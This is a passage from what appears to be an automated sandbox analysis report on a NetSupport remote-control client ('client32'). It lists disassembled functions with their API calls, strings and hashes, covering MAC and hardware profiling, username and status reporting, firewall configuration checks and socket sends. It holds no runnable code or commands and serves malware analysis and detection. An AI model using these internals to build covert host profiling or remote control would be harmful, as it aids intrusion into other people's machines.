SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

nsmdir < GP_MAX, xrefs: 11140F9C
FALSE || !"wrong nsmdir", xrefs: 1114103E
..\ctl32\util.cpp, xrefs: 11140F97, 11141039

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: b1b80692356250f6ca6e36b7e7c75fab51b47a097b04a0fc010fc8780e3fd367
Instruction ID: c1a9514a077855d937a37f92dfa5b0c024edd259558bcf7a9c1bb47bd0b9ea3f
Opcode Fuzzy Hash: b1b80692356250f6ca6e36b7e7c75fab51b47a097b04a0fc010fc8780e3fd367
Instruction Fuzzy Hash: 82515B75E0426E5BD711CF24CC54BDDF7B4EB05B08F2401A4E88977285EBB27A84CBA2

Function 6C3CB8E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 6C3CB941
_free.LIBCMT ref: 6C3CB952
_malloc.LIBCMT ref: 6C3CB970
_free.LIBCMT ref: 6C3CB999
_strtok.LIBCMT ref: 6C3CB9A5

Part of subcall function 6C3D7F80: _memset.LIBCMT ref: 6C3D7F9F
Part of subcall function 6C3D7F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6C3CB916,?,00000100,00000006,00000001), ref: 6C3D7FAC
Part of subcall function 6C3D7F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6C3D7FCB
Part of subcall function 6C3D7F80: GetAdaptersInfo.IPHLPAPI(00000000,?,?,00000000,?), ref: 6C3D7FE0
Part of subcall function 6C3D7F80: _malloc.LIBCMT ref: 6C3D7FFB
Part of subcall function 6C3D7F80: GetAdaptersInfo.IPHLPAPI(00000000,00000000,?,?,00000000,?), ref: 6C3D8015
Part of subcall function 6C3D7F80: wsprintfA.USER32 ref: 6C3D807C

Part of subcall function 6C3D7F80: _free.LIBCMT ref: 6C3D8110
Part of subcall function 6C3D7F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6C3D811C

Strings

MACADDRESS=%s, xrefs: 6C3CB98D

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _free$AdaptersInfoLibrary_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
String ID: MACADDRESS=%s
API String ID: 2837241910-795797190
Opcode ID: 3a4418317097f6012aec43812dd3cd98cde0d91e6c9844dede7f63ccaa135b86
Instruction ID: c90669ad63e9614f5faa584ec5cc84884b7d0fdd6760936f35bb95a751fcbf8f
Opcode Fuzzy Hash: 3a4418317097f6012aec43812dd3cd98cde0d91e6c9844dede7f63ccaa135b86
Instruction Fuzzy Hash: BB212672B4022527D611A7755D45FEE72A88F4AB1CF040295ED84AF780FBA3ED098ED3

Function 6C3CAEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C3D7D00: __vswprintf.LIBCMT ref: 6C3D7D26

Part of subcall function 6C3C5060: _free.LIBCMT ref: 6C3C506A
Part of subcall function 6C3C5060: _malloc.LIBCMT ref: 6C3C5090

_free.LIBCMT ref: 6C3CAF0A

Part of subcall function 6C3E1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C3E1C13
Part of subcall function 6C3E1BFD: GetLastError.KERNEL32(00000000), ref: 6C3E1C25

_free.LIBCMT ref: 6C3CAF39

Part of subcall function 6C3D7B60: _sprintf.LIBCMT ref: 6C3D7B77

Part of subcall function 6C3D77E0: _free.LIBCMT ref: 6C3D77EF

Strings

REQUESTING_HELP=%d, xrefs: 6C3CAED6
CMD=STATUS, xrefs: 6C3CAEC0
CHANNEL=%s, xrefs: 6C3CAF2D
USERNAME=%s, xrefs: 6C3CAEFE

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
API String ID: 1628406020-2994292602
Opcode ID: 142db423b22d5fe5c25296ffb2518d180ce0a5fbe9ab5c5faccaef0a58fefb56
Instruction ID: 596ddbb8451481b194d0128055ee24d17f074fd27c15d629fb98b2266bba52a1
Opcode Fuzzy Hash: 142db423b22d5fe5c25296ffb2518d180ce0a5fbe9ab5c5faccaef0a58fefb56
Instruction Fuzzy Hash: 6C217FB7A00108BBCB11EBE4CC41FEF77789B49608F504549EA41B7644EB30AA498BE6

Function 11017550 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000314,000000FF), ref: 1101758C
CoInitialize.OLE32(00000000), ref: 11017595
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
CoUninitialize.COMBASE ref: 11017620

Strings

Win32_ComputerSystem, xrefs: 110175AD
PCSystemTypeEx, xrefs: 110175CC

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
Instruction ID: f5474d2ce38f90e0a7ff94217669a9bd078e6126dc5b2c5f9befb888d677ae11
Opcode Fuzzy Hash: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
Instruction Fuzzy Hash: C1214CB5E006625BDB50CF648C44B6FBBE48F88348F0004B9FC5DDA188FA78D940C792

Function 11017470 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000314,000000FF), ref: 110174A2
CoInitialize.OLE32(00000000), ref: 110174AB
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 110174D2
CoUninitialize.COMBASE ref: 11017530

Strings

ChassisTypes, xrefs: 110174E2
Win32_SystemEnclosure, xrefs: 110174C3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 085078a93cf01d6cd745efb889e69e74e2bb4d9adf3f1b8d0dfdd7080f47b067
Instruction ID: 5f453893a9419e3fba1624c565a5d58f13e789210917621e1ac34ee451bcfe89
Opcode Fuzzy Hash: 085078a93cf01d6cd745efb889e69e74e2bb4d9adf3f1b8d0dfdd7080f47b067
Instruction Fuzzy Hash: 86212B75D016659BDB11CB60CC44B6EBBE89F84359F0000A9EC29DB248FF79D900C7A1

Function 11135D30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11135D5A
GetTickCount.KERNEL32 ref: 11135D61

Strings

DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135E1C
Client, xrefs: 11135D85
DoICFConfig() OK, xrefs: 11135E06
AutoICFConfig, xrefs: 11135D80

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: 7b2e8e82f2c58a2ab30bcd25ea828e2c076162f50aa6284fde2cb98638086cbc
Instruction ID: fa883785aadc2565eef748b6a86e90a036384920612202802f39f8997ef65e6f
Opcode Fuzzy Hash: 7b2e8e82f2c58a2ab30bcd25ea828e2c076162f50aa6284fde2cb98638086cbc
Instruction Fuzzy Hash: F721E734A222B24AFB638AE5AD9876AFB412780B2FF048035D450861CDE7749485CF7A

Function 6C3C9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 6C3C9C93
timeGetTime.WINMM(?,?,?,00000000), ref: 6C3C9CD0
Sleep.KERNEL32(00000000), ref: 6C3C9CDE
LeaveCriticalSection.KERNEL32(?), ref: 6C3C9D4F
InterlockedIncrement.KERNEL32(?), ref: 6C3C9D72

Strings

3', xrefs: 6C3C9CB2

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 94adf3219e2ca743554d32c4347ecf0ae7052f5c9a5c95ef719cc2e094c5d860
Instruction ID: 83d298f09f0145b7e71ca67c591682d0cc5d027db76ee9a1a76c6f0944c4fdde
Opcode Fuzzy Hash: 94adf3219e2ca743554d32c4347ecf0ae7052f5c9a5c95ef719cc2e094c5d860
Instruction Fuzzy Hash: 7E215071B052258FDB20DF64CC88B9EB3B4AB05318F168295D94DAB645CB35ED84CF92

Function 110259B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 110259C6
K32GetProcessImageFileNameA.KERNEL32(?,?,?,111042CF,00000000,00000000,?,111035E7,00000000,?,00000104), ref: 110259E2
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 110259F6
SetLastError.KERNEL32(00000078,111042CF,00000000,00000000,?,111035E7,00000000,?,00000104), ref: 11025A19

Strings

GetProcessImageFileNameA, xrefs: 110259C0
GetModuleFileNameExA, xrefs: 110259F0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction ID: 0267368db0d213cc5bf1be483e2b2b76458ef177770ab8f8022e472834cf6718
Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction Fuzzy Hash: 8C016136641315ABD321DF65DC84F8BB7E8EB89765F10452AF985D7600D631E800CBA4

Function 1110C340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,1110D2F5,1110CE90,00000001,00000000), ref: 1110C357
CreateThread.KERNEL32(00000000,1110D2F5,00000001,00000000,00000000,0000000C), ref: 1110C37A
WaitForSingleObject.KERNEL32(?,000000FF,?,1110D2F5,1110CE90,00000001,00000000,?,?,?,?,?,110309CC), ref: 1110C3A7
CloseHandle.KERNEL32(?,?,1110D2F5,1110CE90,00000001,00000000,?,?,?,?,?,110309CC), ref: 1110C3B1

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C38B
hThread, xrefs: 1110C390

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: 75477037af4fe5bce21258ace1dcfdefae4ceac2ac7a6d6788021deaac2b5715
Instruction ID: f5cfe19a2c65023992d5486e101f813a89f713485558c9afca106433fe3c5fe1
Opcode Fuzzy Hash: 75477037af4fe5bce21258ace1dcfdefae4ceac2ac7a6d6788021deaac2b5715
Instruction Fuzzy Hash: E80184357447127FE3208E59DC89F5BBBE8EB44B65F108229FB159B2C0D670E5048BA4

Function 110312F0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031337

Strings

_HF, xrefs: 11031318, 1103131D
_HW, xrefs: 11031300
_SW, xrefs: 1103130C
%s%s%s.bin, xrefs: 11031331
124406, xrefs: 1103131E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$124406$_HF$_HW$_SW
API String ID: 2111968516-2587288932
Opcode ID: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
Instruction ID: 2d37ec8be248a08c2e3c36772f725827158d619cf10ab6990a6c8ba6e6d701e2
Opcode Fuzzy Hash: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
Instruction Fuzzy Hash: 93E09B60D2060C7FF30065588C057AFBB9C1F4931AF40C0E0FEE997A82E93494404A92

Function 110FFC20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFC73
GetStockObject.GDI32(00000004), ref: 110FFCCB
RegisterClassA.USER32(?), ref: 110FFCDF
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,00000000,00000000), ref: 110FFD1A

Strings

NSMDesktopWnd, xrefs: 110FFC59, 110FFCD8, 110FFD14

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: a2f12e5cb8144b3ce496c2a76372007a9d3ced29ffed7e88decd9379dc08c227
Instruction ID: 8ec14acb765fe308697af1e0b699cc17b638db9dbc28f04e7c23575fca5ef36d
Opcode Fuzzy Hash: a2f12e5cb8144b3ce496c2a76372007a9d3ced29ffed7e88decd9379dc08c227
Instruction Fuzzy Hash: A93116B1D0125AAFCB41CFA9D880B9EFBF4FB08214F10862EE519E3284E7345544CFA5

Function 111416D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11141740
RegCloseKey.ADVAPI32(?), ref: 111417A4

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11141720
ForceRTL, xrefs: 11141763
